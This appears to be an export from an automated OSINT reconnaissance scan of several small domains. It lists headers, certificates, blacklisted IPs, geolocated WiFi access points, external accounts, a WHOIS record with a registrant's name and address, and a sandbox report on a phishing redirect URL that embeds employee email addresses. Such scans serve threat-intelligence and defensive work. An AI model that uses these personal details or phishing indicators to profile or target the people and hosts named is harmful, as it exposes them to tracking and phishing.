| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fJBUelNZ98yfCYgTc7WNhjysoMluqrTDHq0SVIO%2F0YIAsdqyzhnqcXYutPnufmVGlk%2F%2BT8t3g7wQdFh43VhAxqE%2FmCarJp88icmjJuhwuBRUeOwsppojYEabsQ%3D%3D"}],"group":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fJBUelNZ98yfCYgTc7WNhjysoMluqrTDHq0SVIO%2F0YIAsdqyzhnqcXYutPnufmVGlk%2F%2BT8t3g7wQdFh43VhAxqE%2FmCarJp88icmjJuhwuBRUeOwsppojYEabsQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c59d97743e3-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ENHLG (Net ID: 00:01:36:5B:37:00) | 37.7642, -122.3993 |
| 2023-05-12 03:01:32 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.75): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:44:14 | Domain Name | No | DNS Resolver | 0 | 0 | 1 | 0 | None | ayhu.xyz | ayhu.xyz |
| 2023-05-12 03:01:37 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.139): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:57 | Netblock IPv6 Membership | No | Censys | 0 | 0 | 2 | 0 | None | 2a06:98c1:3120::/48 | 2a06:98c1:3120::1 |
| 2023-05-12 03:00:31 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | umac-64-etm@openssh.com | |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Poshmark (Category: shopping)
https://poshmark.com/closet/ayhu | ayhu |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | cable (Net ID: 00:02:2D:2F:C6:B5) | 37.7642, -122.3993 |
| 2023-05-12 03:13:06 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [007joshie.github.io]
https://www.openphish.com/feed.txt | 007joshie.github.io |
| 2023-05-12 03:01:18 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.154): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:44:05 | SSL Certificate - Raw Data | No | CertSpotter | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:3a:9d:01:de:8f:db:a2:52:4a:02:0c:18:70:da:44:dd:bc
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 13 12:50:47 2023 GMT
Not After : Jun 11 12:50:46 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
20:59:35:73:F8:CD:0E:84:44:DD:6F:B0:C2:B9:45:18:98:00:40:7B
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Mar 13 13:50:48.097 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Mar 13 13:50:48.131 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
| battleb0t.xyz |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | KKR Guest (Net ID: 00:01:21:70:65:31) | 37.7813933,-122.3918002 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | sohqwn1 (Net ID: 00:16:B6:F7:22:6E) | 32.8608, -79.9746 |
| 2023-05-12 02:55:05 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Server: cloudflare
Date: <REDACTED>
Content-Type: text/html
Content-Length: 151
Connection: keep-alive
CF-RAY: 7c5ad9968f0b1cf4-ORD
| 188.114.97.1 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | steemit (Category: social)
https://steemit.com/@login | login |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | tla60e06 (Net ID: 00:25:F0:A6:0E:06) | 37.751, -97.822 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | MobileInternet (Net ID: 00:02:B3:AE:AB:1C) | 50.1188, 8.6843 |
| 2023-05-12 02:44:17 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.com | 185.199.111.153 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/random_1.jpeg | https://funny.battleb0t.xyz/ |
| 2023-05-12 03:01:38 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.151): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/withat_2.jpg | https://funny.battleb0t.xyz/ |
| 2023-05-12 02:54:07 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: <REDACTED>
Content-Type: text/html
Content-Length: 253
Connection: close
CF-RAY: -
| 2606:4700:3031::ac43:8709 |
| 2023-05-12 02:54:38 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c529effee343669-FRA"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 172.67.168.252 |
| 2023-05-12 03:01:35 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.114): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:46:16 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | GitHub Category | battleb0t.github.io |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 1 375 East 2nd St Ch.11 (Net ID: 00:02:2D:8E:C5:7C) | 34.0544, -118.244 |
| 2023-05-12 03:00:57 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 01-scripts.github.io | 185.199.111.153 |
| 2023-05-12 03:31:28 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 5 | 0 | None | abuse@name.com | Domain Name: 007316.XYZ
Registry Domain ID: D339018444-CNIC
Registrar WHOIS Server: whois.name.com
Registrar URL: http://www.name.com/
Updated Date: 2023-01-20T18:05:08.0Z
Creation Date: 2022-12-18T04:19:38.0Z
Registry Expiry Date: 2031-12-18T23:59:59.0Z
Registrar: Name.com, Inc
Registrar IANA ID: 625
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization:
Registrant State/Province: YN
Registrant Country: CN
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: NS1CNB.NAME.COM
Name Server: NS2KNZ.NAME.COM
Name Server: NS3CNA.NAME.COM
Name Server: NS4BLX.NAME.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: jrupp@name.com
Registrar Abuse Contact Phone: +1.7203101849
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:09:26.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Domain Name: 007316.XYZ
Registry Domain ID: D339018444-CNIC
Registrar WHOIS Server: whois.name.com
Registrar URL: http://www.name.com
Updated Date: 2023-01-20T18:05:08Z
Creation Date: 2022-12-18T04:19:38Z
Registrar Registration Expiration Date: 2031-12-18T23:59:59Z
Registrar: Name.com, Inc.
Registrar IANA ID: 625
Reseller:
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID: Not Available From Registry
Registrant Name: Aaron Young
Registrant Organization:
Registrant Street: 408 Longquan Rd.
Registrant City: KM
Registrant State/Province: YN
Registrant Postal Code: 650000
Registrant Country: CN
Registrant Phone: Non-Public Data
Registrant Email: https://www.name.com/contact-domain-whois/007316.xyz/registrant
Registry Admin ID: Not Available From Registry
Admin Name: Aaron Young
Admin Organization:
Admin Street: 408 Longquan Rd.
Admin City: KM
Admin State/Province: YN
Admin Postal Code: 650000
Admin Country: CN
Admin Phone: Non-Public Data
Admin Email: https://www.name.com/contact-domain-whois/007316.xyz/admin
Registry Tech ID: Not Available From Registry
Tech Name: Aaron Young
Tech Organization:
Tech Street: 408 Longquan Rd.
Tech City: KM
Tech State/Province: YN
Tech Postal Code: 650000
Tech Country: CN
Tech Phone: Non-Public Data
Tech Email: https://www.name.com/contact-domain-whois/007316.xyz/tech
Name Server: ns2knz.name.com
Name Server: ns4blx.name.com
Name Server: ns3cna.name.com
Name Server: ns1cnb.name.com
DNSSEC: unSigned
Registrar Abuse Contact Email: abuse@name.com
Registrar Abuse Contact Phone: +1.7203101849
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:09:26Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
|
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | NGMH (Net ID: 00:09:5B:B3:C8:73) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:01:40 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.186): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:19:47 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Pinterest (Category: social)
https://www.pinterest.com/patrickpogoda/ | patrickpogoda |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <no ssid> (Net ID: 00:01:71:0A:07:07) | 52.3759, 4.8975 |
| 2023-05-12 03:03:47 | Co-Hosted Site | No | ThreatMiner | 2 | 0 | 2 | 0 | None | eliaspinheironeto.github.io | 185.199.111.153 |
| 2023-05-12 03:09:49 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 77.170.74.34.bc.googleusercontent.com | 34.74.170.77 |
| 2023-05-12 02:44:05 | SSL Certificate - Issued by | No | CertSpotter | 0 | 0 | 1 | 0 | None | C=US,O=Let's Encrypt,CN=R3 | battleb0t.xyz |
| 2023-05-12 03:03:17 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | webmail.ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:89:7c:23:d8:89:20:d1:c5:b3:ae:30:91:44:3a:23:81:b8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 14 03:53:54 2022 GMT
Not After : Mar 14 03:53:53 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:e5:dd:af:99:9d:87:f1:20:42:ec:19:5a:16:81:
fd:0e:9d:26:43:5b:38:56:01:6c:b9:50:e6:f5:f6:
b7:f4:d9:bc:a6:0e:cd:0a:31:b3:8d:bb:24:04:a8:
02:3f:69:7e:f7:45:10:b5:ca:a5:a1:b5:01:ba:b7:
e8:82:36:5d:7d:4a:67:2b:ea:ed:c8:9d:a8:7d:86:
41:b8:e4:07:fc:50:be:f8:c2:12:f9:9a:f1:3d:47:
b3:9a:27:60:00:dc:a5:4f:8f:6f:e6:86:11:01:b1:
d6:45:d6:cf:7d:92:d8:dd:11:ac:e5:b9:41:b6:0c:
38:5e:c6:36:d3:ff:6e:0d:84:9c:c2:8a:cc:3f:7f:
39:73:81:05:d0:7c:d4:98:d7:c4:2e:70:4d:8f:5d:
72:05:90:a8:a3:08:60:0e:68:3c:fe:ac:07:23:66:
f2:29:3f:3b:9e:fe:9e:1a:5d:c2:2b:f9:d5:68:01:
b1:7f:26:80:2c:5d:d8:4c:d8:54:56:d0:35:f9:31:
4d:76:6c:1a:c1:ba:c3:e7:3a:74:2f:ed:05:4b:a4:
71:2f:df:1e:d5:dc:b9:23:46:96:17:ad:cc:ef:a5:
ee:d7:26:ac:0b:5d:33:ef:55:fd:c5:75:d0:bb:f3:
29:99:ce:33:73:02:ba:2d:3b:cc:c0:6b:10:49:90:
f8:db
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
3D:15:56:A1:3D:00:5C:E7:21:10:87:5C:48:60:81:D6:19:B0:97:7A
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:cpanel.ayhu.xyz, DNS:cpcalendars.ayhu.xyz, DNS:cpcontacts.ayhu.xyz, DNS:mail.ayhu.xyz, DNS:webdisk.ayhu.xyz, DNS:webmail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
26:b6:b9:a7:2f:e5:4c:52:ac:47:f6:61:c0:02:b0:ef:8e:c3:
a6:d3:f1:ec:92:c0:a2:e1:7b:19:b2:3a:4e:87:84:15:a6:4c:
8a:85:bd:36:13:13:c4:da:73:35:49:ef:cb:b3:e1:6a:f3:e3:
6a:cd:e3:23:e6:23:db:2a:e9:31:93:fb:15:36:e7:dc:5c:fa:
c4:54:cb:5a:6a:98:38:29:87:fa:da:f5:13:2c:eb:21:a6:ca:
f5:a7:ff:b2:8b:c4:dc:75:27:1e:79:9e:da:a2:ef:91:70:58:
b0:db:99:37:98:c0:d2:e2:54:58:cd:4b:38:9f:64:cd:b8:28:
b3:53:a2:f7:25:f8:e5:6e:f5:cc:14:4f:d5:0c:26:d1:5d:4e:
26:51:28:7f:b6:23:ed:bf:75:93:69:22:6c:68:43:cc:6d:a2:
d1:16:79:71:e0:05:8c:5a:b0:10:74:43:19:6e:9b:04:0e:8c:
40:57:7c:d4:5f:a9:81:06:c7:26:a0:f5:3e:b1:df:d4:c4:1a:
2d:cd:6c:a6:e8:75:2e:d8:c6:69:39:72:bd:2b:3f:43:f8:67:
8b:9a:da:b6:90:6f:99:25:70:bc:1f:f3:ed:e2:ac:a1:e9:99:
1f:bc:90:9b:26:e4:c0:04:b6:b2:ea:2c:58:3b:a1:0e:f3:0c:
4e:9f:6c:9d
|
| 2023-05-12 03:01:41 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.198): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:59:54 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | astehnkuhl@generalatlantic.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://generalatlantic.com/astehnkuhl@generalatlantic.com%20https://site.php', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Fdev.protektnet.com%2FMNU%2Fgeneralatlantic.com%2Fastehnkuhl%40generalatlantic.com%20https%3A%2F%2Fllink.to%2F%3Fu%3Dhttps%3A%2F%2Fdev.protektnet.com%2FMNU%2Fgeneralatlantic.com%2Fjdenig%40generalatlantic.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_3f4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_3f4_IE_EarlyTabStart_0xe18_Mutex"\n "IsoScope_3f4_IESQMMUTEX_0_331"\n "IsoScope_3f4_IESQMMUTEX_0_519"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_3f4_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1012"\n "IsoScope_3f4_ConnHashTable<1012>_HashTable_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1012"\n 
"\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"\n "172.66.43.150:443"\n "104.21.16.120:443"\n "35.186.254.174:443"\n "104.18.11.207:443"\n "172.67.71.45:443"\n "142.251.32.35:443"\n "172.217.12.99:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"1000logos.net"\n "api.salesflare.com"\n "stackpath.bootstrapcdn.com"\n "track.salesflare.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"* Copyright 2011-2019 Twitter, Inc." 
(Indicator: "twitter")\n "<a href="https://plus.google.com/107971784894043504000/" onclick="window.open(this.href);return false;"><i class="fa fa-google-plus"></i></a>" (Indicator: "plus.google.com")\n "<a href="https://twitter.com/nexcess" onclick="window.open(this.href);return false;"><i class="fa fa-twitter"></i></a>" (Indicator: "twitter")\n "<a href="https://www.facebook.com/nexcess" onclick="window.open(this.href);return false;"><i class="fa fa-facebook"></i></a>" (Indicator: "facebook.com")\n "<a href="https://www.linkedin.com/company/nexcess" onclick="window.open(this.href);return false;"><i class="fa fa-linkedin"></i></a>" (Indicator: "linkedin.com")\n "<a href="https://www.youtube.com/user/nexcessnet" onclick="window.open(this.href);return false;"><i class="fa fa-youtube"></i></a>" (Indicator: "youtube")\n "<p>Congrats on launching your new Website! Spread the good news: <a href="https://twitter.com/share" class="twitter-share-button" data-text="Just launched my new website with @Nexcess!" 
data-count="none">Tweet</a></p>" (Indicator: "twitter")\n "<script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?\'http\':\'https\';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+\'://platform.twitter.com/widgets.js\';fjs.parentNode.insertBefore(js,fjs);}}(document, \'script\', \'twitter-wjs\');</script>" (Indicator: "twitter")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar102F.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1041.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab102E.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab1040.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, 
u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "GJU2ZIBE.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\GJU2ZIBE.txt]- [targetUID: 00000000-00001012]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002472]\n "recaptcha__en_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "www.google_1_.xml" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "styles__ltr_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "~DF50FE3D0FF9FC6B92.TMP" has type "data"- Location: [%TEMP%\\~DF50FE3D0FF9FC6B92.TMP]- [targetUID: 00000000-00001012]\n "_5CF2F181-C1A8-11ED-AA3F-0800274CAE20_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._52546023-C1A8-11ED-AA3F-0800274CAE20_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "site_1_.htm" has type "HTML document ASCII text with no line terminators"- [targetUID: N/A]\n "KFOlCnqEu92Fr1MmEU9fBBc9_1_.ttf" has type "TrueType Font data 18 tables 1st "GDEF" 8 names Microsoft language 0x409 Copyright 2011 Google Inc. All Rights Reserved.Roboto MediumRegularVersion 2.137; 2017Roboto-Me"- [targetUID: N/A]\n "FTU5WTPF.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\FTU5WTPF.txt]- [targetUID: 00000000-00001012]\n "KFOmCnqEu92Fr1Mu4mxP_1_.ttf" has type "TrueType Font data 18 tables 1st "GDEF" 8 names Microsoft language 0x409 Copyright 2011 Google Inc. 
All Rights Reserved.RobotoRegularVersion 2.137; 2017Roboto-Regularht"- [targetUID: N/A]\n "llink_1_.htm" has type "HTML document ASCII text with no line terminators"- [targetUID: N/A]\n "flare_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "_A79A7ACA-C1A9-11ED-AA3F-0800274CAE20_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "5EL6UQQZ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\5EL6UQQZ.txt]- [targetUID: 00000000-00002472]\n "bootstrap.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-169', u'name': u'Found mail related domain names', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/003', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.003', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Observed email domain:"!1,w)})},u).prototype.cr=function(){},u.prototype.xy=function(){this.mx.g().focus()},u.prototype.tt=function(w,z,u,r,e,z,y){return(r=((z=new a_((e=["api","payload",(u=void 0===u?"":u,y=["p",0,37],2)],f)[29](y[2],e[y[1]],e[1])+u),z.u).set(y[0],w),wx.y()).get(),z.u.set("k",v[7](16,e[2],r)),z&&z.u.set("id",z),z).tostring()},u).prototype.h1=function(){},u.prototype.ia=function(w,z){(((this.su[(z=["qu",30,"sq"],z)[0]](w),this).mx[z[0]](w),this).rr[z[0]](w),this)[z[2]][z[0]](w),this.bi[z[0]](w),v[z[1]](9," [Source: recaptcha__en_1_.js]\n Observed email 
